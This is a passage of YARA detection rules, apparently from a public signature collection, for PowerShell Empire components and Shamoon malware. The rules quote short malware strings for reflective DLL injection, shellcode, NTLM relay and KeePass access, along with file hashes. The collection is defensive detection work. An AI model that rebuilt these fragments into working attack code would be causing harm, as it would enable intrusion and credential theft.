hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
hash3 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
hash5 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
hash6 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
hash8 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
id = "eab277ca-0dd4-5035-82aa-1ac2120bac94"
strings:
$x1 = "$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)" fullword ascii
$s20 = "#Shellcode: CallDllMain.asm" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}
rule Empire_Agent_Gen {
meta:
description = "Detects Empire component - from files agent.ps1, agent.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
hash2 = "380fd09bfbe47d5c8c870c1c97ff6f44982b699b55b61e7c803d3423eb4768db"
id = "0fac915c-2502-50da-93d1-f81e9282aa9a"
strings:
$s1 = "$wc.Headers.Add(\"User-Agent\",$script:UserAgent)" fullword ascii
$s2 = "$min = [int]((1-$script:AgentJitter)*$script:AgentDelay)" fullword ascii
$s3 = "if ($script:AgentDelay -ne 0){" fullword ascii
condition:
( uint16(0) == 0x660a and filesize < 100KB and 1 of them ) or all of them
}
rule Empire_PowerShell_Framework_Gen3 {
meta:
description = "Detects Empire component"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
hash3 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
hash4 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
id = "b0f7ed41-be65-5e43-aeb1-56e5e7384e8f"
strings:
$s1 = "if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))" fullword ascii
$s2 = "remote DLL injection" ascii
condition:
( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}
rule Empire_Invoke_InveighRelay_Gen {
meta:
description = "Detects Empire component - from files Invoke-InveighRelay.ps1, Invoke-InveighRelay.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash2 = "21b90762150f804485219ad36fa509aeda210d46453307a9761c816040312f41"
id = "0adebf6f-99e1-5461-8efc-e4660faf6d5d"
strings:
$s1 = "$inveigh.SMBRelay_failed_list.Add(\"$HTTP_NTLM_domain_string\\$HTTP_NTLM_user_string $SMBRelayTarget\")" fullword ascii
$s2 = "$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 200KB and 1 of them ) or all of them
}
rule Empire_KeePassConfig_Gen {
meta:
description = "Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash2 = "5a76e642357792bb4270114d7cd76ce45ba24b0d741f5c6b916aeebd45cff2b3"
id = "e2bc88c5-50f8-5ddc-a449-41929b1d0528"
strings:
$s1 = "$KeePassXML = [xml](Get-Content -Path $KeePassXMLPath)" fullword ascii
condition:
( uint16(0) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
}
rule Empire_Invoke_Portscan_Gen {
meta:
description = "Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash2 = "cf7030be01fab47e79e4afc9e0d4857479b06a5f68654717f3bc1bc67a0f38d3"
id = "c2e01780-02d2-57d1-b38e-5c345ebccad6"
strings:
$s1 = "Test-Port -h $h -p $Port -timeout $Timeout" fullword ascii
$s2 = "1 {$nHosts=10; $Threads = 32; $Timeout = 5000 }" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 100KB and 1 of them ) or all of them
}
rule Empire_PowerShell_Framework_Gen4 {
meta:
description = "Detects Empire component"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "743c51334f17751cfd881be84b56f648edbdaf31f8186de88d094892edc644a9"
hash2 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
hash3 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
hash4 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
hash5 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
hash6 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
hash7 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
hash8 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
hash9 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
hash10 = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
id = "c390638a-0eb1-576d-a08c-203c31d414f3"
strings:
$s1 = "Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }" fullword ascii
$s2 = "# Get a handle to the module specified" fullword ascii
$s3 = "$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))" fullword ascii
$s4 = "$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
}
rule Empire_Invoke_Gen {
meta:
description = "Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
id = "913f971d-e4e3-55e9-904b-82b25a4e6f0f"
strings:
$s1 = "$Shellcode1 += 0x48" fullword ascii
$s2 = "$PEHandle = [IntPtr]::Zero" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 3000KB and 1 of them ) or all of them
}
rule Empire_PowerShell_Framework_Gen5 {
meta:
description = "Detects Empire component"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://github.com/adaptivethreat/Empire"
date = "2016-11-05"
super_rule = 1
hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
id = "4c23592e-5788-5b84-995a-028142cbc52f"
strings:
$s1 = "if ($ExeArgs -ne $null -and $ExeArgs -ne '')" fullword ascii
$s2 = "$ExeArgs = \"ReflectiveExe $ExeArgs\"" fullword ascii
condition:
( uint16(0) == 0x7566 and filesize < 1000KB and 1 of them ) or all of them
}
rule CrowdStrike_Shamoon_DroppedFile {
meta:
description = "Rule to detect Shamoon malware http://goo.gl/QTxohN"
reference = "http://www.rsaconference.com/writable/presentations/file_upload/exp-w01-hacking-exposed-day-of-destruction.pdf"
id = "b350f1b1-db73-574b-957b-34e5a84f68b0"
strings:
$testn123 = "test123" wide
$testn456 = "test456" wide
$testn789 = "test789" wide
$testdomain = "testdomain.com" wide $pingcmd = "ping -n 30 127.0.0.1 >nul" wide
condition:
(any of ($testn*) or $pingcmd) and $testdomain
}
rule Shamoon2_Wiper {
meta:
description = "Detects Shamoon 2.0 Wiper Component"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://goo.gl/jKIfGB"
date = "2016-12-01"
score = 70
hash1 = "c7fc1f9c2bed748b50a599ee2fa609eb7c9ddaeb9cd16633ba0d10cf66891d8a"
hash2 = "128fa5815c6fee68463b18051c1a1ccdf28c599ce321691686b1efa4838a2acd"
id = "6660a64c-daa4-59e6-aa65-55194cac600c"
strings:
$a1 = "\\??\\%s\\System32\\%s.exe" fullword wide
$x1 = "IWHBWWHVCIDBRAFUASIIWURRTWRTIBIVJDGWTRRREFDEAEBIAEBJGGCSVUHGVJUHADIEWAFGWADRUWDTJBHTSITDVVBCIDCWHRHVTDVCDESTHWSUAEHGTWTJWFIRTBRB" wide
$s1 = "UFWYNYNTS" fullword wide
$s2 = "\\\\?\\ElRawDisk" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them ) or ( 3 of them )
}
rule Shamoon2_ComComp {
meta:
description = "Detects Shamoon 2.0 Communication Components"
author = "Florian Roth (Nextron Systems) (with Binar.ly)"
reference = "https://goo.gl/jKIfGB"
date = "2016-12-01"
score = 70
hash1 = "61c1c8fc8b268127751ac565ed4abd6bdab8d2d0f2ff6074291b2d54b0228842"
id = "72068264-4f71-59fb-b3d8-938285ec8c7f"
strings:
$s1 = "mkdir %s%s > nul 2>&1" fullword ascii
$s2 = "p[%s%s%d.%s" fullword ascii
$op1 = { 04 32 cb 88 04 37 88 4c 37 01 88 54 37 02 83 c6 }
$op2 = { c8 02 d2 c0 e9 06 02 d2 24 3f 02 d1 88 45 fb 8d }
$op3 = { 0c 3b 40 8d 4e 01 47 3b c1 7c d8 83 fe 03 7d 1c }
condition:
uint16(0) == 0x5a4d and filesize < 500KB and ( all of ($s*) or all of ($op*) )
}